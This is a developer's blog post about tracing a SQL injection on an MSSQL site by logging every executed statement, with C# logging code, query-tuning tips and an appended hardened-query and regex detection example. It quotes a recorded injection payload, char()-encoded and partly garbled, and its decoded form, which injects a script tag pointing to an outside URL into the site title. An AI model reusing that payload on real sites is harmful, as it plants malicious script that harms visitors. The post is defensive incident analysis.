Notes on a successful SQL injection intrusion detection, with SQL performance optimization as a bonus (MSSQL)

Tags: datetime, httpcontext, sql injection
But if you are handed a website built by a second-rate developer and told to revamp it, without being allowed to throw it away, only to replace the old code step by step, then you will be in a lot of pain. Here is the problem I ran into:
Problem 1.
The boss says to you: the site was fine before you came and had no trojan on it; now that you are here there is one. Don't argue, just fix it quickly. I went completely silent. Arguing would only prove that you and the boss are equally ignorant; instead, bring evidence and a factual analysis so that the people at the company understand the technology a little and see together that the website being hung with a trojan is not your fault.
So I carefully went through the site directory, removed the web shell that had been uploaded through FCKeditor, patched the FCK upload vulnerability and wrote up these FCKeditor notes. Many people have run into this and fixed it; they are small problems. But making the boss understand is far more painful than fixing the problem: I explained until I was sweating, then had to call in everyone at the company with a bit of technical knowledge, show them what a small web shell is, and demo how a trojan gets uploaded. Good grief, a hacking tutorial for the whole office.
Problem 2.
The site had problems again. The last problem had been solved only two months earlier, and the site was hung with a trojan again. As the boss put it, the problems started after I came; I left immediately. This is why you should not argue head-on with people who do not understand technology, let alone tell your boss that he does not understand.
But what really killed me is that the site had been built by the previous second-rate developer by modifying another CMS. I had to keep the old modules working while developing the site, renovating the underlying code step by step, and with so many pages you can hardly check each one for a vulnerability. If you write the test code below, this becomes much easier, and you can optimize your SQL the same way.
The first step is to create a SQL log table.
The code is as follows:

CREATE TABLE [dbo].[My_sqllog] (
    [ID] [bigint] IDENTITY (1,1) NOT NULL,
    [Hit] [bigint] NULL,
    [SQLText] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
    [Paramdetails] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
    [BeginTime] [datetime] NULL,
    [Endtime] [datetime] NULL,
    [Fromurl] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
    [IP] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL, -- the length was garbled in the source; max is used here
    [Lastelapsedtime] [bigint] NULL,
    CONSTRAINT [Pk_my_sqllog] PRIMARY KEY CLUSTERED
    (
        [ID] ASC
    ) WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]

It logs the SQL statement, the number of times that statement was executed, the parameter names and values, the start time, the end time, the page it came from, the IP, and the execution time of the statement (not used yet).
The second step is to write the logging code in SqlHelper.
The two methods could have been made private, but elsewhere in that second-rate site other SqlHelper classes are called directly, so here they go through a reasonably optimized SqlHelper class.
Code 1: Inserting a log entry
The code is as follows:

public static int ExecuteSqlLog(CommandType commandType, string commandText, params DbParameter[] cmdParams)
{
    #region parameter processing
    string colums = "";
    string dbTypes = "";
    string values = "";
    string paramDetails = "";
    if (cmdParams != null && cmdParams.Length > 0)
    {
        foreach (DbParameter param in cmdParams)
        {
            if (param == null)
            {
                continue;
            }
            colums += param.ParameterName + " ";
            dbTypes += param.DbType + " ";
            values += param.Value + ";";
        }
        paramDetails = string.Format("{0},{1},{2}", colums, dbTypes, values);
    }
    string fromUrl = "";
    if (System.Web.HttpContext.Current != null)
    {
        fromUrl = System.Web.HttpContext.Current.Request.Url.ToString();
    }
    // The original replaces quotes and semicolons in the statement text before logging;
    // the replacement characters were lost in extraction. The text is bound as a
    // parameter below, so this step is cosmetic only.
    commandText = commandText.Replace("'", "'").Replace(";", ";");
    SqlParameter[] parameters = new SqlParameter[]
    {
        new SqlParameter("@hit", 1),
        new SqlParameter("@sqltext", commandText),
        new SqlParameter("@paramdetails", paramDetails),
        new SqlParameter("@begintime", DateTime.Now),
        new SqlParameter("@endtime", DateTime.Now),
        new SqlParameter("@fromurl", fromUrl),
        new SqlParameter("@ip", Web.PressRequest.GetIP()),
        new SqlParameter("@lastelapsedtime", 0),
    };
    #endregion
    using (DbConnection connection = Factory.CreateConnection())
    {
        connection.ConnectionString = GetRealConnectionString(commandText); // connectionString;
        string sql = "";
        // Check whether this statement text has already been logged.
        // ExecuteScalarLog does not log itself, so there is no recursion.
        int id = Utils.TypeConverter.ObjectToInt(ExecuteScalarLog(CommandType.Text,
            "select top 1 ID from My_sqllog where SQLText = @sqltext",
            new SqlParameter("@sqltext", commandText)));
        if (id > 0)
        {
            // id is an int produced above, so concatenating it cannot inject anything.
            sql = "update My_sqllog set Hit = Hit + 1, IP = @ip, Endtime = @endtime, Fromurl = @fromurl where ID = " + id;
        }
        else
        {
            sql = "insert into My_sqllog (Hit, SQLText, Paramdetails, BeginTime, Endtime, Fromurl, IP, Lastelapsedtime) values (@hit, @sqltext, @paramdetails, @begintime, @endtime, @fromurl, @ip, @lastelapsedtime)";
        }
        // Create the DbCommand and prepare it (PrepareCommand opens the connection if needed)
        DbCommand cmd = Factory.CreateCommand();
        bool mustCloseConnection = false;
        PrepareCommand(cmd, connection, (DbTransaction)null, commandType, sql, parameters, out mustCloseConnection);
        // Execute the DbCommand and return the result
        int retval = cmd.ExecuteNonQuery();
        // Clear the parameters so they can be used again
        cmd.Parameters.Clear();
        if (mustCloseConnection)
            connection.Close();
        return retval;
    }
}

Code 2: Determine whether this SQL already exists
The code is as follows:

private static object ExecuteScalarLog(CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
    if (ConnectionString == null || ConnectionString.Length == 0) throw new ArgumentNullException("ConnectionString");
    // Create and open the database connection; the using block releases it when done
    using (DbConnection connection = Factory.CreateConnection())
    {
        if (connection == null) throw new ArgumentNullException("Connection");
        connection.Close();
        connection.ConnectionString = GetRealConnectionString(commandText);
        connection.Open();
        // Create the DbCommand and prepare it
        DbCommand cmd = Factory.CreateCommand();
        bool mustCloseConnection = false;
        PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
        // Execute the DbCommand and return the result
        object retval = cmd.ExecuteScalar();
        // Clear the parameters so they can be used again
        cmd.Parameters.Clear();
        if (mustCloseConnection)
            connection.Close();
        return retval;
    }
}

The third step is to add the following code to each of your SQL-executing methods, whether ExecuteScalar, ExecuteReader, ExecuteNonQuery or any other.
The code is as follows:

// Log the statement before executing it
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);

Code example:
The code is as follows:

public static object ExecuteScalar(DbConnection connection, CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
    if (connection == null) throw new ArgumentNullException("Connection");
    connection.Close();
    connection.ConnectionString = GetRealConnectionString(commandText);
    connection.Open();
    // Create the DbCommand and prepare it
    DbCommand cmd = Factory.CreateCommand();
    bool mustCloseConnection = false;
    PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
    // Log the statement before executing it
    int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);
    // Execute the DbCommand and return the result
    object retval = cmd.ExecuteScalar();
    // Clear the parameters so they can be used again
    cmd.Parameters.Clear();
    if (mustCloseConnection)
        connection.Close();
    return retval;
}

Then you will find that the entry point of the intrusion has been recorded, and at the end of the logged statement is the SQL that constructs the injection.

The constructed SQL, as it was recorded, is:

39191+update+my_websetting+set+websitetitle=replace (Websitetitle+as+varchar (8000)), cast (char) +char (47) +char (116) +char (a) +char (116) +char (108) +char (a) +char (a) +char (a) +char (m) +char (a) +char (114) +char (105) + char (112) +char (116) +char (a) +char (()) +char (114) +char () +char (+char) +char (116) +char (112) + char (+char) +char (a) +char +char (102) +char (114) +char () +char (a) +char () +char (a) +char ( +char (109) +char () +char (117) +char (114) +char (a) +char (112) +char () +char (112) +char (+) +char (47) + char (+char) +char (114) +char (a) +char (112) +char (116) +char (+) +as+varchar (8000)), cast (char) +as+varchar (8))) --
Decoded, it becomes:

Update my_websetting set Websitetitle=replace (CAST (websitetitle as varchar (8000)), Websitetitle+ ' </title>< Script src=http://jb51.net/ur.php></script> ')
That is the trojan address; do not click on it, curiosity killed the cat.

Summary:
Now that you know the entry point, you know how to fix it: filter string-typed input, keep int-typed input as an int, and do not let the database do the implicit conversion for you. With this SQL log table you will also find that the hit count is worth something.
Run select top 100 * from My_sqllog order by hit desc
and you will find that a lot of the SQL you wrote really is garbage; if conditions allow, why not put it in a cache. So the SQL I wrote later basically no longer shows up in that top 100.
That is about it; experts are welcome to criticize. I hope that students who have just learned to program do not use the above intrusion method to bully small websites; they cannot take the damage.
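The two points of the summary in working code, as an added example that is not part of the article or its SqlHelper: a read that binds the id as a typed int parameter so the database never does an implicit conversion, and a review pass over the My_sqllog table created above that surfaces the most executed statements whose text shows the injection pattern recorded in this post. The my_article table, its title column, the connection string and the regex heuristics are assumptions of this example.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class InjectionGuard
{
    // Hardened read (the fix the summary recommends). The id is validated as an
    // int in C# and bound as SqlDbType.Int, so a value like "39191 update ..."
    // never reaches SQL Server as statement text. my_article/title are assumed.
    public static object GetTitleById(string connectionString, string rawId)
    {
        if (!int.TryParse(rawId, out int id) || id <= 0)
            throw new ArgumentException("id must be a positive integer");

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand("SELECT title FROM my_article WHERE id = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            return cmd.ExecuteScalar();
        }
    }

    // Heuristic (my own, not the article's): a number or ';' directly followed by a
    // second statement, or the char(NN)+char(NN) obfuscation seen in the logged attack.
    private static readonly Regex Suspicious = new Regex(
        @"(\d|;)\s*(update|insert|delete|drop|exec|declare)\b|\bchar\s*\(\d+\)\s*\+",
        RegexOptions.IgnoreCase | RegexOptions.Compiled);

    public static bool LooksInjected(string sqlText) => Suspicious.IsMatch(sqlText ?? "");

    // Review pass over the article's log table: walk the top-N statements by hit
    // count (the same query the summary suggests) and print the ones that match.
    public static void PrintSuspiciousHotspots(string connectionString, int top = 100)
    {
        const string query =
            "SELECT TOP (@top) SQLText, Hit, Fromurl, IP FROM My_sqllog ORDER BY Hit DESC";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(query, conn))
        {
            cmd.Parameters.Add("@top", SqlDbType.Int).Value = top;
            conn.Open();
            using (var r = cmd.ExecuteReader())
                while (r.Read())
                {
                    var text = r["SQLText"] as string;
                    if (LooksInjected(text))
                        Console.WriteLine($"[{r["Hit"]} hits] {r["Fromurl"]} from {r["IP"]}: {text}");
                }
        }
    }
}
```

Running PrintSuspiciousHotspots against the log table after the fix should show the old injected entries still sitting at the top by hit count, which is a useful reminder of which pages to cache or rewrite first.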
Author: Jqbird
